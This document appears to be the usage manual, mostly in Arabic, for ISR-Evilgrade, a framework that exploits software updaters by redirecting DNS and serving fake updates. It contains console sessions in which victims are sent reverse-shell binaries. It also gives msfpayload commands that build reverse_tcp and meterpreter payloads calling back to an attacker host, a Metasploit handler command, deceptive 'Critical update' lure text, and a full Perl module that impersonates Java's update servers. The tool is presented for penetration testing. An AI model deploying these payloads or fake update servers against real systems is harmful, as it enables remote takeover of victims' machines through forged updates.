
Evilgrade هو إطار عمل معياري يسمح للمستخدم باستغلال تطبيقات الترقية الضعيفة عن طريق حقن تحديثات مزيفة.
Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --
Evilgrade هو إطار معياري يسمح للمستخدم بالاستفادة من تطبيقات الترقية الضعيفة عن طريق حقن تحديثات وهمية. يأتي مع برامج ثنائية معدة مسبقًا (عوامل)، وتكوين افتراضي جاهز لاختبارات الاختراق السريعة، وله خادم ويب وخادم DNS خاصان به. سهل إعداد إعدادات جديدة، ويحتوي على تكوين تلقائي عند إعداد عوامل ثنائية جديدة.
يأتي هذا الإطار حيز الاستخدام عندما يتمكن المهاجم من إجراء إعادة توجيه اسم المضيف (التلاعب بحركة DNS الخاصة بالضحية)، ويمكن فعل ذلك في سيناريوهين:
يعمل Evilgrade مع وحدات، في كل وحدة يوجد هيكل مطبق ضروري لمحاكاة تحديث وهمي لتطبيق/نظام معين.
ISR-Evilgrade هو عبر المنصات، يعتمد فقط على وجود حمولة مناسبة للمنصة المستهدفة المراد استغلالها.
يعمل بشكل مشابه لوحدة تحكم IOS``` evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available
Object: options - Show options of current module. vhosts - Show VirtualHosts of current module. modules - List all modules available for use. active - Show active modules.
## قائمة الوحدات المُنفَّذة``` console
evilgrade>show modules
List of modules:
===============
...
...
...
- 63 modules available.
evilgrade>conf sunjava evilgrade(sunjava)>
#### عرض كل VirtualHosts.
#### حقل VirtualHost يحتوي على النطاقات التي سيقوم خادم الويب الخاص بنا بمحاكاتها لنا.``` console
evilgrade>show vhosts
Virtual hosts:
=============
[
"java.sun.com",
"javadl-esd.sun.com",
...
...
...
]
evilgrade(sunjava)>show options
Name = Sun Microsystems Java Version = 2.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "java.sun.com|javadl-esd.sun.com"
.-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------'
#### بدء الخدمات (DNS Server وWebServer)``` console
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#### Waiting for victims
evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"
evilgrade>show status Webserver (pid 4134) already running
.---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'
## .:: [الاستخدام العميق] ::.
### الأوامر
#### configure / conf - تكوين <module-name>
مثال:
-------``` console
evilgrade>configure sunjava
evilgrade(sunjava)>
evilgrade>conf sunjava
evilgrade(sunjava)>
## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>
##
reload - Reload to get all modules update (to refresh loaded modules, useful on development)
start - Start webserver
stop - Stop webserver (fake update server)
مثال: -------``` console evilgrade>start evilgrade> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ... evilgrade> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#######################################
evilgrade>stop Stopping WEBSERVER [OK] Stopping DNSSERVER [OK]
#######################################
restart - Restart services (WebServer and DNS Server) stops and starts again
#######################################
status - Get webserver and victims status
evilgrade>show status Webserver (pid 4134) already running
.---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'
#######################################
show - Display information of .
#######################################
show active - Display active modules in the webserver
#######################################
show modules - Display implemented modules
#########################################
show options - Display modules/global options
evilgrade>show options
.-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------'
evilgrade> evilgrade(notepadplus)>conf vmware evilgrade(vmware)>show options (without started services)
Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com"
.----------------------------------------------. | Name | Default | Description | +--------+-------------------+-----------------+ | enable | 1 | Status | | agent | ./agent/agent.exe | Agent to inject | '--------+-------------------+-----------------'
evilgrade(vmware)>show options (with started services after setting agent)
Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com"
.--------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+------------------------------------------------------------------+-----------------+ | enable | 1 | Status | | agentmd5 | f80af637642170507bda998b6f2015fa | | | agentsize | 54576 | | | agent | ./agent/agent.exe | Agent to inject | | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | | '-------------+------------------------------------------------------------------+-----------------'
#########################################
set - Configure variables global or modules
evilgrade>show options
.-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 0 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------'
###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)
evilgrade>set debug 1 #Enable debug set debug, 1
evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening set DNSAnswerIp, 192.168.1.4
evilgrade>show options
.-------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-------------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-------------+---------------------------------------------------------'
###############################
exit - exits the program
#######################################
help - prints this screen, or help on 'command'
#######################################
## .:: [ADVANCED] ::.
- خيارات الوحدات:
كل وحدة لها خيارات خاصة، لكن حقل "agent" موجود دائمًا.
الوكيل هو ملف التحديث الوهمي الخاص بنا، ويجب علينا تعيين المسار إلى مكان وجوده أو تنفيذ توليد ديناميكي لملف التحديث الوهمي.
[التوليد الديناميكي لملف التحديث الوهمي] يسمح بتنفيذ أمر خارجي لتوليد ملفنا الثنائي، على سبيل المثال باستخدام msfpayload من إطار metasploit.
باستخدام هذه الميزة يمكننا توليد أي حمولة من metasploit أو استخدام واجهة خارجية لإنشاء الملف الثنائي.
# مثال 1:```
evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
في هذه الحالة، لكل ملف ثنائي تحديث مطلوب نقوم بإنشاء ملف ثنائي تحديث وهمي يحتوي على الحمولة "windows/shell_reverse_tcp" باستخدام شيل عكسي للاتصال بالعنوان 192.168.233.2 على المنفذ 4141.
العلامة <%OUT%><%OUT> هي علامة خاصة لاكتشاف أين سيتم إنشاء الملف الثنائي الناتج.
يكتشف Evilgrade استخدام "ميزة الملف الثنائي التحديث الوهمي الديناميكي" بسبب وجود جملة بين قوسين مربعين '[]'
داخل هذين القوسين لدينا سلسلة نصية محصورة أيضًا بين قوسين "" يتم تجميعها باستخدام perl.
على سبيل المثال إذا استخدمنا:``` evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'
ثم في كل مرة نحصل فيها على طلب ثنائي، سيقوم evilgrade بتجميع السطر وتنفيذ السلسلة النهائية "./generatebin -o /tmp/update(random).exe" مما ينتج عوامل مختلفة.
بديل سهل، لكنه ليس ديناميكيًا، يمكن أن يكون توليد الحمولة مباشرة من msfpayload على طرفية وتعيينها يدويًا لتكوين الوحدة.
# المثال 2:
(خارج evilgrade)```
[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
(داخل evilgrade)``` evilgrade(sunjava)>set agent /tmp/reverse-shell.exe
بعد إنشاء الحمولة، نترك multi handler يستمع على LHOST المحدد سابقًا.
(خارج evilgrade)```
[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E
[*] Started reverse handler on 192.168.100.2:4444
[*] Starting the payload handler...
تطوير الوحدة بسيط للغاية. بما أن evilgrade يعتمد على الوحدات، كل ما عليك فعله هو استخدام حزمة .pm (وحدة perl). في هذه الحالة، سنقوم بوصف وحدة تحديث sunjava (التعليقات بـ #):``` perl package modules::sunjava;
use strict; use Data::Dump qw(dump);
my $base= { 'name' => 'Sun Microsystems Java', #name of the module to display in the framework 'version' => '2.0', #internal module version 'appver' => '<= 1.6.0_22', #last application version tested with this evilgrade module 'author' => [ 'Francisco Amato < famato +[AT]+ faradaysec.com>' ], #author 'description' => qq{}, #brief description 'vh' => '(java.sun.com|javadl-esd.sun.com)', #VirtualHosts that the application uses to retrieve information about the update configuration files and update binaries.
#Then we have the request object's collection
'request' => [
#Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com)
{
'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/update/1.6.0/map\-m\-1.6.0.xml)', #The required URL, regex friendly
'type' => 'file', #it's the response type (file|string|agent|install)
#we can use:
#file: response with content file referenced in the "file" option below (./include/sunjava_map.xml)
#string: response with a string referenced in the "string" options below
#agent: response with content file referenced in the "agent" options (options section)
#install: response with content file referenced in the "file" option below
#It's used to know if the fake update was executed
#In some update process we can specify a final page after update installed
#so we send to a controller page.
'method' => '', #not implemented yet
'bin' => '', #set to 1 if we are going to send a binary file
'string' => '', #if we have chosen the 'type' string then in this variable we set the response
'parse' => '', #set to 1 if the file or string need be parsed with options
'file' => './include/sunjava/sunjava_map.xml'
},
{
'req' => '^/java_update.xml$', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/sunjava/sunjava_update.xml'
},
{
'req' => '/x.jnlp', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
#In this case we parse the file
'parse' => '1',
#To parse the file we use special tags, like <%OPTIONAME%> inside the "file" or "string" field
#This tags are replaced with the values of the options, for example
#<%TITLE%> will be replaced by 'Critical update'
'file' => './include/sunjava/x.jnlp'
},
{
'req' => '.jar', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => '',
'file' => './include/sunjava/JavaPayload/FunnyClass2.jar'
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #Here we have an agent type with a binary response
'bin' => 1,
'method' => '', #any
'string' => '',
'parse' => '',
'file' => ''
}
],
#Options
#Here we have the options that will be displayed with "show options" inside the current module.
#This options are used to parse the string or a file using in the responses
'options' => { 'agent' => { 'val' => './agent/java/javaws.exe', #The default value
'desc' => 'Agent to inject'}, #Brief description
'arg' => { 'val' => 'http://java.sun.com/x.jnlp"',
'desc' => 'Arg passed to Agent'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
#The following is a dynamic hidden option,
#In this case we use the tag <%NAME%> to parse the files and execute perl functions to get randoms values
#You can use whatever you like in perl, if you're wishing to use more functions check "isrcore/utils.pm"
'name' => { 'val' => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
'hidden' => 1,
'dynamic' =>1,},
#All the options depend on the update process. You have to research the possible variables and implement them on your module
#These are the mostly common update messages, webpages, descriptions, popup messages, title, etc
'title' => { 'val' => 'Critical update',
'desc' => 'Title name displayed in the update'},
'description' => { 'val' => 'This critical update fix internal vulnerability',
'desc' => 'Description to be displayed during the update'},
'atitle' => { 'val' => 'Critical vulnerability',
'desc' => 'Title name to be displayed in the systray item popup'},
'adescription' => { 'val' => 'This critical update fix internal vulnerability',
'desc' => 'Description to be displayed in the systray item popup'},
'website' => { 'val' => 'http://java.com/moreinfolink',
'desc' => 'Website displayed in the update'}
}
};
## .:: [نصائح] ::.
1) لا تنس تشغيل evilgrade باستخدام مستخدم لديه صلاحيات لإنشاء مآخذ استماع،
وإلا فلن تتمكن من استخدام خدمات evilgrade.
2) في كل مرة تقوم فيها بتعديل وحدة نمطية أثناء تشغيل evilgrade، لا تنس 'إعادة تحميلها'.
3) قم بتعيين البرنامج الثنائي 'agents' قبل بدء الخدمات لأن هناك بعض الحقول التي سيقوم evilgrade
بتعبئتها لك (agentmd5، agentsha256، و agentsize) والتي لا يمكن القيام بها أثناء تشغيلها بالفعل.
4) إذا كنت تستخدم استجابة ديناميكية بمتغيرات مثل: <%AGENTSIZE%>، <%AGENTMD5%>، <%URL\_FILE%>، <%URL\_FILE\_EXT%>، أو متغيرات مخصصة محددة في قسم الخيارات، لا تنس ضبط *parse* على 1.
5) نفس الشيء ينطبق على حقن وكيل، يجب عليك تفعيل علامة *bin* على 1.
6) إذا أردت إنشاء استجابات نصية باستخدام HTTP، استخدم العلامة *cheader*. المثال أدناه:```
{ 'req' => '/sitepath/download/file.zip'
, #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
7) To filter via User-Agent, use as an example the Sparkle2 module. In base add 'useragent' => 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped "User-Agent: ".
Data::Dump
Digest::MD5
Time::HiRes
RPC::XML
## .:: [مزيد من المعلومات] ::.
تم تقديم هذا الإطار في المؤتمرات الأمنية التالية:```
· ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]
· Troopers 2008 [Munich, Germany] [www.troopers08.org]
· Shakacon 2008 [Hawaii, USA] [www.shakacon.org]
· H2HC 2009 [Brazil] [www.h2hc.com.br]
· Blackhat Arsenal & Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]
Francisco Amato famato+at+faradaysec+dot+com